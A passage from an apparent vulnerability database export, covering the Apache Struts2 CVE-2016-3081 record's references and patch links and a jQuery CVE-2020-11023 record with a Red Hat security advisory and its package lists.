"CVE-2016-3081", trust: 2.8, }, { db: "BID", id: "87327", trust: 1.9, }, { db: "BID", id: "91787", trust: 1.9, }, { db: "PACKETSTORM", id: "136856", trust: 1.6, }, { db: "SECTRACK", id: "1035665", trust: 1.6, }, { db: "EXPLOIT-DB", id: "39756", trust: 1.6, }, { db: "JVN", id: "JVNVU91375252", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2016-002326", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201604-585", trust: 0.6, }, { db: "VULMON", id: "CVE-2016-3081", trust: 0.1, }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, id: "VAR-201604-0434", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VARIoT devices database", id: null, }, ], trust: 0.592803025, }, last_update_date: "2024-11-23T20:43:13.540000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "S2-032: Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.", trust: 0.8, url: "http://struts.apache.org/docs/s2-032.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "Oracle Critical Patch Update Advisory - October 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { title: "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html", }, { 
title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "October 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update", }, { title: "Apache Struts 2 Fixes for arbitrary code execution vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=61268", }, { title: "Red Hat: CVE-2016-3081", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2016-3081", }, { title: "Forcepoint Security Advisories: CVE-2016-3081 Apache Struts 2 security vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories&qid=11425734a2681a4f1da0e4a7a8f3837d", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c", }, { title: "PyEXP", trust: 0.1, url: "https://github.com/jooeji/PyEXP ", }, { title: "S02-32-POC", trust: 0.1, url: "https://github.com/killerhack/S02-32-POC ", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-77", trust: 1, }, { problemtype: "CWE-Other", trust: 0.8, }, ], sources: [ { db: "JVNDB", id: 
"JVNDB-2016-002326", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.2, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.9, url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { trust: 1.9, url: "https://struts.apache.org/docs/s2-032.html", }, { trust: 1.6, url: "http://www.securityfocus.com/bid/87327", }, { trust: 1.6, url: "https://www.exploit-db.com/exploits/39756/", }, { trust: 1.6, url: "http://www.securitytracker.com/id/1035665", }, { trust: 1.6, url: "http://packetstormsecurity.com/files/136856/apache-struts-2.3.28-dynamic-method-invocation-remote-code-execution.html", }, { trust: 1.6, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1, url: "http://www.rapid7.com/db/modules/exploit/multi/http/struts_dmi_exec", }, { trust: 1, url: "http://www.rapid7.com/db/modules/exploit/linux/http/struts_dmi_exec", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3081", }, { trust: 0.8, url: "https://www.ipa.go.jp/security/ciadr/vul/20160427-struts.html", }, { trust: 0.8, url: "https://www.jpcert.or.jp/at/2016/at160020.html", }, { trust: 0.8, url: "http://jvn.jp/cert/jvnvu91375252", }, { trust: 0.8, url: "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3081", }, { trust: 0.8, url: "http://seclab.dbappsecurity.com.cn/?p=924", }, { trust: 0.6, url: "http/struts_dmi_exec", }, { trust: 0.6, url: "http://www.rapid7.com/db/modules/exploit/multi/", }, { trust: 0.6, url: "http://www.rapid7.com/db/modules/exploit/linux/", }, { trust: 0.3, url: "http://struts.apache.org/", }, { trust: 0.3, url: 
"http://www.huawei.com/en/psirt/security-notices/huawei-sn-20160427-01-struts2-en", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, ], sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-04-26T00:00:00", db: "VULMON", id: "CVE-2016-3081", }, { date: "2016-04-22T00:00:00", db: "BID", id: "87327", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-04-28T00:00:00", db: "JVNDB", id: "JVNDB-2016-002326", }, { date: "2016-04-26T00:00:00", db: "CNNVD", id: "CNNVD-201604-585", }, { date: "2016-04-26T14:59:02.207000", db: "NVD", id: "CVE-2016-3081", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2019-08-12T00:00:00", db: "VULMON", id: "CVE-2016-3081", }, { date: "2016-10-26T01:16:00", db: "BID", id: "87327", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-11-22T00:00:00", db: "JVNDB", id: "JVNDB-2016-002326", }, { date: "2019-08-15T00:00:00", db: "CNNVD", id: "CNNVD-201604-585", }, { date: "2024-11-21T02:49:19.503000", db: "NVD", id: 
"CVE-2016-3081", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts2 Arbitrary code execution vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2016-002326", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, ], trust: 0.6, }, }
var-202004-2191
Vulnerability from variot
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American programmer John Resig. The library simplifies the interaction between HTML and JavaScript, and is modular and extensible through plug-ins. A cross-site scripting vulnerability exists in jQuery versions from 1.2 up to, but not including, 3.5.0. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute code on the client. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:4847-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4847
Issue date: 2020-11-03
CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040 CVE-2018-14042 CVE-2019-8331 CVE-2019-10146 CVE-2019-10179 CVE-2019-10221 CVE-2019-11358 CVE-2020-1721 CVE-2020-11022 CVE-2020-11023 CVE-2020-15720
====================================================================
1. Summary:
An update for the pki-core:10.6 and pki-deps:10.6 modules is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
3. Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.
Security Fix(es):
- jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
- bootstrap: XSS in the data-target attribute (CVE-2016-10735)
- bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
- bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
- bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
- jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
- jquery: Cross-site scripting due to improper handling in the jQuery.htmlPrefilter method (CVE-2020-11022)
- jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
- pki: Dogtag's python client does not validate certificates (CVE-2020-15720)
- pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page (CVE-2019-10146)
- pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab (CVE-2019-10179)
- pki-core: Reflected XSS in getcookies?url= endpoint in CA (CVE-2019-10221)
- pki-core: KRA vulnerable to reflected XSS via the getPk12 page (CVE-2020-1721)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 
1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 
'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: apache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.src.rpm apache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.src.rpm apache-commons-net-3.6-3.module+el8.3.0+6805+72837426.src.rpm bea-stax-1.2.0-16.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-jaxb-2.2.11-11.module+el8.1.0+3366+6dfb954c.src.rpm glassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.src.rpm jackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm jackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.src.rpm jackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.src.rpm jakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.src.rpm javassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.src.rpm jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.src.rpm ldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.src.rpm pki-core-10.9.4-1.module+el8.3.0+8058+d5cd4219.src.rpm pki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.src.rpm python-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.src.rpm relaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.src.rpm resteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.src.rpm slf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.src.rpm stax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.src.rpm tomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.src.rpm velocity-1.7-24.module+el8.1.0+3366+6dfb954c.src.rpm xalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.src.rpm xerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.src.rpm xml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.src.rpm xml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.src.rpm xmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.src.rpm xsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.src.rpm
aarch64: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm
noarch: apache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.noarch.rpm apache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.noarch.rpm apache-commons-net-3.6-3.module+el8.3.0+6805+72837426.noarch.rpm bea-stax-api-1.2.0-16.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-core-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-runtime-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm glassfish-jaxb-txw2-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm jackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm jackson-jaxrs-json-provider-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm jackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm jackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.noarch.rpm jakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.noarch.rpm javassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm javassist-javadoc-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm ldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm ldapjdk-javadoc-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm pki-base-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-base-java-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-ca-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-kra-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-server-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm pki-servlet-4.0-api-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm pki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm python3-pki-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm relaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.noarch.rpm resteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.noarch.rpm 
slf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm slf4j-jdk14-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm stax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.noarch.rpm tomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.noarch.rpm velocity-1.7-24.module+el8.1.0+3366+6dfb954c.noarch.rpm xalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.noarch.rpm xerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.noarch.rpm xml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.noarch.rpm xml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.noarch.rpm xmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.noarch.rpm xsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.noarch.rpm
ppc64le: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm
s390x: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm
x86_64: jss-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm jss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm pki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm python-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm python3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-9251 https://access.redhat.com/security/cve/CVE-2016-10735 https://access.redhat.com/security/cve/CVE-2018-14040 https://access.redhat.com/security/cve/CVE-2018-14042 https://access.redhat.com/security/cve/CVE-2019-8331 https://access.redhat.com/security/cve/CVE-2019-10146 https://access.redhat.com/security/cve/CVE-2019-10179 https://access.redhat.com/security/cve/CVE-2019-10221 https://access.redhat.com/security/cve/CVE-2019-11358 https://access.redhat.com/security/cve/CVE-2020-1721 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/cve/CVE-2020-15720 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX6I3GNzjgjWX9erEAQiK8w//dJasljC8LcJheQtDfUXL+EG52rGjpyxU B5iSYariTDhQOFRt22udOjbdBaISRD77ozLdz0LusA1NBtR3hQ49ryIWyMUxLNsi 46FLY44YxMY7uofZJExUJoEkN39CYwXqIOaaGnZ8mkn4QVdoKG+UBvBL3gKcE3uk h+PWQaasCHL96ZuLz5OB1ya0StcgVcnIDOJleP0f4TGI8w5LKSj1bdJz2fD1H+JP iBa3QVedFanQpWVqCAjaw2lH+fQUB4F936XltKsqCKD9uaX1A2m+xAMZ8wuHcCUl Nudj4LwT06xGd36tyQVh+0ZolB7aKmErYNicv25VNz1c/QlmXCiBJi3Y62/a7La0 t8bGYPE01RTI1YvLs8c+Bw0SH+NcGPGtLw9Vd8w9hFYed7JUP6Iv9v/lSfbiUXDD R5gcEJPQtN2pRsqZaCmQCY2i9aNwjmyZ3wggmXJ4DtEy5adTmAmTL/Alf8kx1rfC UjfeBWVQ01QMIcwNCZM9ly6au06fioPjHhusCFPqPWnGCoT6mysF//ZOhLemUQci ecbYX+JbbUnbyWQPVIBhV/Zj4D6SqNtY5rciorwTedC8n2zX/8ORTCn1PZz8Oc1S ebaoJI0TA2DuiUtPkKz1REcD8rnSCxPIhCYWfb4nIXKGjBINW8ueyG27VPprkSOh +Ybici9RaUE=VLtX -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
